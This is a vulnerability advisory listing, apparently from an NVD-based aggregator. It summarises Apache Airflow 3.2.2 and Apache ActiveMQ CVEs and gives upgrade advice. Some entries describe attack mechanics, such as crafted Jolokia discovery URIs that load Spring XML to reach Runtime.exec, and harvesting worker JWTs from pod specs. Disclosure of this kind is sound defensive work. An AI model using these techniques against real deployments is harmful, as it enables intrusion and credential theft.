A bug in Apache Airflow's Variable response masker caused nested-key redaction (triggered by secret-suffixed key names like `password`, `token`, `secret`, `api_key`) to be bypassed when the JSON value's nesting depth exceeded the shared secrets masker's recursion limit: the masker returned the original nested item before checking the sensitive key name. An authenticated UI/API user with Variable read permission could harvest plaintext secret values stored under sensitive keys nested deep enough to exceed the masker's depth cap. Affects deployments that store sensitive values inside deeply-nested JSON Variables. This is a residual gap in the fix for CVE-2026-32690 (which covered shallower nesting via `max_depth=1`); the depth-limit boundary itself was not raised, so the same key-name bypass pattern reappears beyond the recursion cap. Users who already upgraded for CVE-2026-32690 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the deep-nesting path.
AirFlow
CVE-2026-42359 Jun 01, 2026
Apache Airflow 3.2.2 XCom PATCH RCE Exploit via Reserved Keys
A bug in Apache Airflow's XCom PATCH endpoint `PATCH /api/v2/xcomEntries/{key}` allowed an authenticated UI/API user with XCom write permission on a Dag to set XCom entries under reserved key names (e.g. `return_value`) that the matching POST endpoint already validated against `FORBIDDEN_XCOM_KEYS`. The endpoint also accepted serialized payload shapes the triggerer's deserializer treats as code; combined, this allowed RCE on the triggerer when the affected task next deferred. Affects deployments where untrusted users have XCom write permission on Dags that defer to the triggerer. This is a fix-bypass of CVE-2026-33858: PR #64148 added the `FORBIDDEN_XCOM_KEYS` validator only on the POST/set path; the PATCH path was not covered. Users who already upgraded for CVE-2026-33858 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the PATCH-path bypass.
AirFlow
CVE-2026-45360 Jun 01, 2026
Apache Airflow Scheduler RCE via Arbitrary Class Import (pre-3.2.2)
Apache Airflow's scheduler-side deadline-reference decoder (`SerializedCustomReference.deserialize_reference`) imported and dispatched arbitrary class paths drawn from DAG-author-controlled serialized state without an allowlist or plugin-registry gate. A DAG author whose code reaches the scheduler (the default on single-host deployments, where the DAG bundle is importable from the scheduler process) could embed a custom `DeadlineReference` whose serialized form named an attacker-controlled module path, causing the scheduler to `import_string(...)` and instantiate that class with a live SQLAlchemy session attached. Affects deployments where DAG-author code is less trusted than the scheduler process. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.
AirFlow
CVE-2026-45426 Jun 01, 2026
Apache Airflow LogServer JWT Lstrip Auth Bypass (3.2.1)
Exploitation requires the attacker to already be an authenticated Airflow worker holding a valid Log-server JWT issued for at least one Dag. Apache Airflow's Log server authorized JWT tokens against Dag IDs by applying Python's `str.lstrip()` to the requested path segment when verifying the JWT's `sub` claim. `str.lstrip()` strips any of a *set* of characters from the left (not a prefix), so a JWT issued for a Dag named e.g. `dag_a` would authorize log access to any other Dag whose name began with any subset of the characters `{d, a, g, _}` (e.g. `dag_attacker`, `aaaa_target`, `_dag_secret`). Such an authenticated worker could enumerate and read worker logs of other Dags whose names happened to share that character-class prefix, leaking task output and error traces beyond the documented per-Dag isolation boundary. Affects deployments relying on per-Dag log-access scoping (multi-team, shared-executor, shared-worker topologies). Users are advised to upgrade to `apache-airflow` 3.2.2 or later.
AirFlow
CVE-2026-46764 Jun 01, 2026
Apache Airflow 3.2.2 Fix: EventLogs API ID Enumeration Priv Escalation
The Event Log detail endpoint `GET /api/v2/eventLogs/{event_log_id}` in Apache Airflow fetched audit-log rows directly by numeric ID after only the generic Audit Log permission check, while the collection endpoint `GET /api/v2/eventLogs` applied per-Dag scoping. An authenticated UI/API user with audit-log read permission for one Dag could retrieve audit-log entries for any other Dag by guessing or enumerating the numeric event log ID. Affects deployments that rely on per-Dag audit-log scoping. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.
AirFlow
CVE-2026-48726 Jun 01, 2026
Apache Airflow JWT Retained After Logout in FAB/Keycloak (v<3.2.2)
A bug in Apache Airflow's auth manager logout handling left previously-issued JWT tokens valid after the user clicked logout in the UI: the logout flow for `FabAuthManager` and `KeycloakAuthManager` did not actually reach the underlying `revoke_token()` call, so the JWT remained accepted by the API server until its natural expiry. An attacker holding a previously-issued JWT for a logged-out user could continue to make authenticated API calls as that user. Affects deployments configured with `FabAuthManager` or `KeycloakAuthManager` (the bug does not affect SimpleAuthManager). This is a residual gap in the fix for CVE-2025-57735, which addressed cookie-side invalidation in PR #57992 / PR #61339 but did not cover the provider-side `revoke_token()` reachability in the FAB / Keycloak code paths. Users who already upgraded for CVE-2025-57735 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the FAB / Keycloak logout paths.
AirFlow
CVE-2026-49298 Jun 01, 2026
Apache Airflow 3.2.2+ JWT Leakage in KubernetesExecutor (CVE-2026-49298)
A bug in Apache Airflow's KubernetesExecutor caused the JWT tokens worker pods use to authenticate against the Execution API to be passed to the worker container as command-line arguments visible in the pod spec. An authenticated UI/API user with Kubernetes read-only access to the cluster (e.g. `pods/get` in the Airflow namespace) could harvest the JWT from `kubectl describe pod` output and then call state-mutating Execution API endpoints: triggering Dag runs, clearing runs, and reading or writing Variables / Connections / XComs as if they were a running task. Affects deployments using the `KubernetesExecutor`. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. This is the airflow-core half of the same vulnerability addressed by [CVE-2026-27173](https://www.cve.org/CVERecord?id=CVE-2026-27173), which shipped the apache-airflow-providers-cncf-kubernetes side of the fix. Deployments that already upgraded `apache-airflow-providers-cncf-kubernetes` to 10.17.0 or later per the CVE-2026-27173 advisory should additionally upgrade `apache-airflow` to 3.2.2 or later to close the core-side surface; the two fixes are complementary, not duplicates.
AirFlow
CVE-2026-42253 Jun 01, 2026
Apache ActiveMQ Web (5.19.7/6.2.6) XSS via MessageServlet header injection
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache ActiveMQ, Apache ActiveMQ Web. The MessageServlet in the ActiveMQ web console API copies every JMS message property into an HTTP response header without any validation. This can allow overwriting and injecting security headers by setting them on JMS messages that are returned by the servlet. This issue affects Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ Web: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue. The MessageServlet has now been deprecated and disabled by default.
ActiveMQ
CVE-2026-42588 Jun 01, 2026
Apache ActiveMQ <5.19.7 / <6.2.6 Code Injection via Jolokia JMX Bridge
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter using the "masterslave://" URL, which can allow loading a Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue.
ActiveMQ
CVE-2026-45505 Jun 01, 2026
Apache ActiveMQ Broker Code Injection via Jolokia before 5.19.7 / 6.0-6.2.6
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ. Non-parenthesized discovery wrappers such as `masterslave:vm://...,...` and `static:vm://...` incorrectly pass validation, allowing a bypass of the fix for CVE-2026-34197. Original description from CVE-2026-34197: Apache ActiveMQ exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue.
ActiveMQ
CVE-2026-46605 Jun 01, 2026
Apache ActiveMQ Auth Bypass <=5.19.6, <=6.2.5 Removes Destinations
Incomplete authorization in the Apache ActiveMQ server before versions v6.2.6 and v5.19.7 allows authenticated connections to remove existing destinations without proper permissions. This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version v6.2.6 or v5.19.7, which fixes the issue.
ActiveMQ
CVE-2026-49157 Jun 01, 2026
Apache ActiveMQ Jolokia Permission Escalation (5.19.6, <6.2.6)
Incorrect Default Permissions vulnerability in Apache ActiveMQ. This issue affects Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. The default Jolokia authorization settings granted non-admin (low-privilege) web-login accounts access to Jolokia operations, which allowed executing broker management operations meant for admins, such as addQueue and removeQueue. Users are recommended to upgrade to version 6.2.6 or 5.19.7, which fixes the issue.
ActiveMQ
Built by Foundeo Inc., with data from the National Vulnerability Database (NVD).